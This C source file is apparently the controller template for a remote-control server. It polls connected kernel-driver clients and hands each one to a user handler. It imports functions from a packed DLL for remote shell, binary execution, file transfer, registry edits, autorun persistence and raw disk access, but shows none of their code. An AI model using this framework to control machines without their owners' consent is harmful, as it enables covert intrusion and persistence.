﻿/*
	Author: Axt Müller
	Description: Windows-Batch-Deployment simple user-defined server program template.
	Warning: THIS FILE SHOULD NOT BE MODIFIED.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Windows.h>
#include "template.h"

//Output macro used for the console messages in this file; currently a plain alias of printf.
#define PRINTF printf

//One entry of the client worker-thread table (g_c_t).
typedef struct _CLIENT_THREAD_INFO
{
	//Hash of the client that owns this entry; 0 marks the entry as free.
	ULONG64 hash;
	//Thread ID recorded for that client; 0 means no thread is registered.
	ULONG thread;
}CLIENT_THREAD_INFO, *PCLIENT_THREAD_INFO;

//Signature of the user-defined handler that WorkerThread calls for a connected client.
//p is the worker's private copy of the client info, szClientVersion is the client version as a decimal string.
typedef void (__stdcall *WorkingProcedure)(PCLIENT_INFO p, char *szClientVersion);

//User-defined handler, set by CreateSimpleServer; may be NULL, in which case workers do nothing.
WorkingProcedure g_pWorkingProcedure = NULL;
//Latest client version string, filled in by CheckUpdate through _UpdateClient.
CHAR g_szLatestClientVersion[16] = {0};
//Hashes recorded by AddHash (used for the "connect only once" mode); only the first g_HashCount entries are valid.
ULONG64 g_Hash[MAX_CONNECT_REQUEST] = {0};
ULONG g_HashCount = 0;
//Table of registered client worker threads; every access goes through g_c_t_lock.
CLIENT_THREAD_INFO g_c_t[MAX_CONNECT_REQUEST] = {0};
//Guards g_c_t. Initialized and deleted by CreateSimpleServer.
CRITICAL_SECTION g_c_t_lock = {0};

//Entry points of the server DLL. All of them stay NULL until InitializeApis resolves
//them with GetProcAddress; each variable is named after its export with a leading underscore.
//The pointer types are not declared in this file (presumably they come from template.h).
init _init = NULL;
uninit _uninit = NULL;
ClientList _ClientList = NULL;
ClientConnect _ClientConnect = NULL;
ClientDisconnect _ClientDisconnect = NULL;
ClientTest _ClientTest = NULL;
ClientReboot _ClientReboot = NULL;
ClientShutdown _ClientShutdown = NULL;
ClientUpdate _ClientUpdate = NULL;
ClientConfig _ClientConfig = NULL;
CmdQueryDirectory _CmdQueryDirectory = NULL;
CmdUploadFileTo _CmdUploadFileTo = NULL;
CmdDownloadFileFrom _CmdDownloadFileFrom = NULL;
CmdExecuteBinary _CmdExecuteBinary = NULL;
CmdSystemShell _CmdSystemShell = NULL;
CmdFileOperation _CmdFileOperation = NULL;
CmdQueryRegistry _CmdQueryRegistry = NULL;
CmdRegistryOperation _CmdRegistryOperation = NULL;
CmdAddAutoRunBin _CmdAddAutoRunBin = NULL;
CmdDelAutoRunBin _CmdDelAutoRunBin = NULL;
CmdQueryAutoRunBin _CmdQueryAutoRunBin = NULL;
CmdClearAutoRunBin _CmdClearAutoRunBin = NULL;
CmdQuerySetSystemInformation _CmdQuerySetSystemInformation = NULL;
CmdReadWriteDisk _CmdReadWriteDisk = NULL;
UpdateServer _UpdateServer = NULL;
UpdateClient _UpdateClient = NULL;

BOOLEAN InitializeApis()
{
#ifdef _M_X64
	HMODULE hMod = LoadLibraryW(L"Server64.vmp.dll");
	if(!hMod){hMod = LoadLibraryW(L"Server64.dll");}
#else
	HMODULE hMod = LoadLibraryW(L"Server32.vmp.dll");
	if(!hMod){hMod = LoadLibraryW(L"Server32.dll");}
#endif
	if(hMod)
	{
		_init = (init)GetProcAddress(hMod, "init");
		_uninit = (uninit)GetProcAddress(hMod, "uninit");
		_ClientList = (ClientList)GetProcAddress(hMod, "ClientList");
		_ClientConnect = (ClientConnect)GetProcAddress(hMod, "ClientConnect");
		_ClientDisconnect = (ClientDisconnect)GetProcAddress(hMod, "ClientDisconnect");
		_ClientTest = (ClientTest)GetProcAddress(hMod, "ClientTest");
		_ClientReboot = (ClientReboot)GetProcAddress(hMod, "ClientReboot");
		_ClientShutdown = (ClientShutdown)GetProcAddress(hMod, "ClientShutdown");
		_ClientUpdate = (ClientUpdate)GetProcAddress(hMod, "ClientUpdate");
		_ClientConfig = (ClientConfig)GetProcAddress(hMod, "ClientConfig");
		_CmdQueryDirectory = (CmdQueryDirectory)GetProcAddress(hMod, "CmdQueryDirectory");
		_CmdUploadFileTo = (CmdUploadFileTo)GetProcAddress(hMod, "CmdUploadFileTo");
		_CmdDownloadFileFrom = (CmdDownloadFileFrom)GetProcAddress(hMod, "CmdDownloadFileFrom");
		_CmdExecuteBinary = (CmdExecuteBinary)GetProcAddress(hMod, "CmdExecuteBinary");
		_CmdSystemShell = (CmdSystemShell)GetProcAddress(hMod, "CmdSystemShell");
		_CmdFileOperation = (CmdFileOperation)GetProcAddress(hMod, "CmdFileOperation");
		_CmdQueryRegistry = (CmdQueryRegistry)GetProcAddress(hMod, "CmdQueryRegistry");
		_CmdRegistryOperation = (CmdRegistryOperation)GetProcAddress(hMod, "CmdRegistryOperation");
		_CmdAddAutoRunBin = (CmdAddAutoRunBin)GetProcAddress(hMod, "CmdAddAutoRunBin");
		_CmdDelAutoRunBin = (CmdDelAutoRunBin)GetProcAddress(hMod, "CmdDelAutoRunBin");
		_CmdQueryAutoRunBin = (CmdQueryAutoRunBin)GetProcAddress(hMod, "CmdQueryAutoRunBin");
		_CmdClearAutoRunBin = (CmdClearAutoRunBin)GetProcAddress(hMod, "CmdClearAutoRunBin");
		_CmdQuerySetSystemInformation = (CmdQuerySetSystemInformation)GetProcAddress(hMod, "CmdQuerySetSystemInformation");
		_CmdReadWriteDisk = (CmdReadWriteDisk)GetProcAddress(hMod, "CmdReadWriteDisk");
		_UpdateServer = (UpdateServer)GetProcAddress(hMod, "UpdateServer");
		_UpdateClient = (UpdateClient)GetProcAddress(hMod, "UpdateClient");
		if(_init && _uninit && _ClientList && _ClientConnect && _ClientDisconnect && 
			_ClientTest && _ClientReboot && _ClientShutdown && _ClientUpdate && _ClientConfig && 
			_CmdQueryDirectory && _CmdUploadFileTo && _CmdDownloadFileFrom && _CmdExecuteBinary && 
			_CmdSystemShell && _CmdFileOperation && _CmdQueryRegistry && _CmdRegistryOperation && 
			_CmdAddAutoRunBin && _CmdDelAutoRunBin && _CmdQueryAutoRunBin && _CmdClearAutoRunBin && 
			_CmdQuerySetSystemInformation && _CmdReadWriteDisk && _UpdateServer && _UpdateClient)
		{
			return TRUE;
		}
	}
	return FALSE;
}

/*
	Queries the latest client and server versions through the server DLL
	and prints the results.

	The latest client version is stored in g_szLatestClientVersion.
	The server versions are only printed and compared (case-insensitively)
	to report whether the server DLL is up to date.
	Must only be called after InitializeApis has succeeded, because it calls
	_UpdateClient and _UpdateServer unconditionally.
	NOTE(review): the file names passed to the DLL are presumably the
	locations where the latest binaries get stored - confirm against the DLL.
*/
void CheckUpdate()
{
	char szLatestServerVersion[16] = {0}, szCurrentServerVersion[16] = {0};
	//Query the latest version of client driver.
	if(_UpdateClient(g_szLatestClientVersion, "LatestClient32.sys", "LatestClient64.sys"))
	{
		PRINTF("Latest Client Version: %s\n", g_szLatestClientVersion);
	}
	else
	{
		PRINTF("Check client update unsuccessfully!\n");
	}
	//Query the latest version of server DLL.
	if(!_UpdateServer(szCurrentServerVersion, szLatestServerVersion, "LatestServer32.dll", "LatestServer64.dll"))
	{
		PRINTF("Check server update unsuccessfully!\n");
		return;
	}
	PRINTF("Latest Server Version: %s\n", szLatestServerVersion);
	PRINTF("Current Server Version: %s\n", szCurrentServerVersion);
	//_stricmp is the conforming CRT name (stricmp is the deprecated alias) and
	//matches the _strnicmp call used elsewhere in this file.
	if(_stricmp(szLatestServerVersion, szCurrentServerVersion)==0)
	{
		PRINTF("The server DLL is up to date.\n");
	}
	else
	{
		PRINTF("The server DLL needs to be updated!\n");
	}
}

/*
	Tells whether a client hash has already been recorded by AddHash.
	Only the first g_HashCount entries of g_Hash are examined.
	Returns TRUE when the hash is found, FALSE otherwise.
*/
BOOLEAN CheckHash(ULONG64 hash)
{
	ULONG idx = 0;
	while(idx < g_HashCount)
	{
		if(g_Hash[idx] == hash)
		{
			return TRUE;
		}
		idx++;
	}
	return FALSE;
}

/*
	Appends a client hash to g_Hash.
	When the list already holds MAX_CONNECT_REQUEST entries the hash is
	silently dropped.
*/
void AddHash(ULONG64 hash)
{
	if(g_HashCount >= MAX_CONNECT_REQUEST)
	{
		//The list is full, nothing can be recorded.
		return;
	}
	g_Hash[g_HashCount++] = hash;
}

/*
	Tells whether a worker thread is currently registered for a client.
	Looks up the first g_c_t entry whose hash equals `hash` and returns TRUE
	when that entry holds a non-zero thread ID; returns FALSE when there is
	no such entry or its thread ID is 0.
	The table is read while holding g_c_t_lock.
*/
BOOLEAN IsClientThreadAlive(ULONG64 hash)
{
	BOOLEAN bAlive = FALSE;
	ULONG slot = 0;
	EnterCriticalSection(&g_c_t_lock);
	//Advance to the first entry that belongs to this hash (if any).
	while(slot < MAX_CONNECT_REQUEST && g_c_t[slot].hash != hash)
	{
		slot++;
	}
	if(slot < MAX_CONNECT_REQUEST && g_c_t[slot].thread)
	{
		bAlive = TRUE;
	}
	LeaveCriticalSection(&g_c_t_lock);
	return bAlive;
}

/*
	Registers or unregisters a client worker thread in g_c_t.

	tid != 0: stores (hash, tid) in the first free entry (entry hash == 0).
	tid == 0: clears the first entry whose hash equals `hash`.

	Returns TRUE when an entry was written, FALSE when no free entry
	(registering) or no matching entry (unregistering) exists.
	The table is modified while holding g_c_t_lock.
*/
BOOLEAN AddDelClientThread(ULONG64 hash, DWORD tid)
{
	//Registering looks for a free entry (hash 0) and writes the client hash;
	//unregistering looks for the client hash and writes 0. In both cases the
	//thread field ends up equal to tid.
	const ULONG64 wanted = tid ? 0 : hash;
	const ULONG64 stored = tid ? hash : 0;
	BOOLEAN bDone = FALSE;
	ULONG slot;
	EnterCriticalSection(&g_c_t_lock);
	for(slot = 0; slot < MAX_CONNECT_REQUEST && !bDone; slot++)
	{
		if(g_c_t[slot].hash == wanted)
		{
			g_c_t[slot].hash = stored;
			g_c_t[slot].thread = tid;
			bDone = TRUE;
		}
	}
	LeaveCriticalSection(&g_c_t_lock);
	return bDone;
}

/*
	Thread routine that serves one connected client.

	parameter: heap-allocated CLIENT_INFO copy; this routine owns it and
	releases it with FREE before the thread ends.

	The routine polls _ClientTest every USN_PAGE_SIZE / 4 milliseconds, for at
	most USN_PAGE_SIZE * 4 milliseconds, until a non-zero client version is
	reported. If a version arrives, the user-defined working procedure (if any)
	is called with the client info and the version as a decimal string.
	In every case the thread then unregisters itself from the thread table,
	disconnects the client and terminates through ExitThread(0).

	NOTE(review): the routine is not declared WINAPI although it is started
	through a cast to LPTHREAD_START_ROUTINE; it never returns normally and
	always ends in ExitThread - keep it that way unless the calling
	convention is fixed as well.
*/
DWORD WorkerThread(void *parameter)
{
	PCLIENT_INFO p = (PCLIENT_INFO)parameter;
	ULONG WaitTime = 0;
	ULONG64 ClientVersion = 0;
	//An unsigned 64-bit value needs up to 20 decimal digits plus the terminator.
	char szClientVersion[24] = {0};
	//Wait for the client connection to complete, it needs some time!
	while(WaitTime < USN_PAGE_SIZE * 4)
	{
		Sleep(USN_PAGE_SIZE / 4);
		WaitTime += USN_PAGE_SIZE / 4;
		_ClientTest(p->id, &ClientVersion);
		if(ClientVersion)
		{
			PRINTF("[%04ld]The client version: %lu.\n", p->id, (ULONG)ClientVersion);
			//The version is unsigned, so convert it with the unsigned routine.
			_ui64toa(ClientVersion, szClientVersion, 10);
			break;
		}
	}
	if(ClientVersion)
	{
		//Call the working procedure
		if(g_pWorkingProcedure)
		{
			g_pWorkingProcedure(p, szClientVersion);
		}
	}
	else
	{
		//If ClientVersion is 0, it means that the connection was not established successfully.
		PRINTF("[%04ld]The client did not connect.\n", p->id);
	}
	PRINTF("[%04ld]Thread exited!!!\n", p->id);
	//Mark the client's thread has exited, disconnect the client and exit thread.
	AddDelClientThread(p->hash, 0);
	_ClientDisconnect(p->id);
	FREE(p);
	ExitThread(0);
}

void __stdcall CreateSimpleServer
(
	DWORD dwServerPort, 
	void *pWorkingProcedure, 
	BOOLEAN bCheckUpdate, 
	BOOLEAN bOnlyConnectOnce, 
	DWORD dwMaxQueryCount,
	DWORD dwQueryInterval
)
{
	DWORD dwQueryCount = 0;
	//Allocate memory for saving CLIENT_INFO structures.
	PCLIENT_INFO pClientInfo = (PCLIENT_INFO)MALLOC(MAX_CONNECT_REQUEST*sizeof(CLIENT_INFO));
	if(pClientInfo)
	{
		//Set user-defined handling function
		g_pWorkingProcedure = (WorkingProcedure)pWorkingProcedure;
		//Initialize critical section.
		InitializeCriticalSection(&g_c_t_lock);
		//Initialize DLL.
		if(InitializeApis())
		{
			//Check update if needed.
			if(bCheckUpdate)
			{
				printf("Checking for updates...\n");
				CheckUpdate();
			}
			//Initialize connection.
			if(_init((int)dwServerPort))
			{
				printf("The initialization is done. Now working...\n");
				//Cyclically query and handle clients.
				while(1)
				{
					//Query clients.
					ULONG i, c = _ClientList(pClientInfo);
					if(c)
					{
						//Traverse every client.
						for(i = 0; i < c; i++)
						{
							//Check the clients that wait for connection.
							if(_strnicmp(pClientInfo[i].szStatus, CLIENT_STATUS_ONLINE, strlen(CLIENT_STATUS_ONLINE))==0)
							{
								BOOLEAN bNeedConnect = TRUE;
								//For some situations, the clients don't need be connected again if operations are done.
								if(bOnlyConnectOnce)
								{
									//If the client is not in the list, add it to the list and let it connect. Otherwise, ignore it.
									if(CheckHash(pClientInfo[i].hash))
									{
										bNeedConnect = FALSE;
									}
									else
									{
										AddHash(pClientInfo[i].hash);
									}
								}
								//Handle the clients that need to be connected.
								if(bNeedConnect)
								{
									//If the thread for this client is still running, don't create a new thread for it.
									if(IsClientThreadAlive(pClientInfo[i].hash)==FALSE)
									{
										PRINTF("NEW-CLIENT: %04ld %016I64X %s %s\n", pClientInfo[i].id, pClientInfo[i].hash, pClientInfo[i].szAddr, pClientInfo[i].szDescription);
										//Try to connect the client.
										if(_ClientConnect(pClientInfo[i].id))
										{
											//Allocate memory for new client info.
											PCLIENT_INFO pc = (PCLIENT_INFO)MALLOC(sizeof(CLIENT_INFO));
											if(pc)
											{
												ULONG tid = 0;
												HANDLE h = NULL;
												//Copy client info.
												memcpy(pc, &pClientInfo[i], sizeof(CLIENT_INFO));
												//Create a thread to handle each client.
												h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WorkerThread, pc, 0, &tid);
												if(h)
												{
													//Mark the client's thread has created.
													AddDelClientThread(pClientInfo[i].hash, tid);
													CloseHandle(h);
												}
											}
										}
									}
								}
							}
						}
					}
					//Clear current client info.
					RtlZeroMemory(pClientInfo, sizeof(pClientInfo));
					//Wait a while, and then query clients again.
					Sleep(dwQueryInterval);
					//Decide to continue or break out of the loop, if dwMaxQueryCount is not 0.
					if(dwMaxQueryCount>0)
					{
						dwQueryCount++;
						if(dwQueryCount>=dwMaxQueryCount)
						{
							break;
						}
					}
				}
				_uninit();
			}
			else
			{
				PRINTF("Initialize connection unsuccessfully.\n");
			}
		}
		else
		{
			PRINTF("Loading DLL unsuccessfully.\n");
		}
		DeleteCriticalSection(&g_c_t_lock);
		FREE(pClientInfo);
	}
	else
	{
		PRINTF("Allocate memory unsuccessfully.\n");
	}
}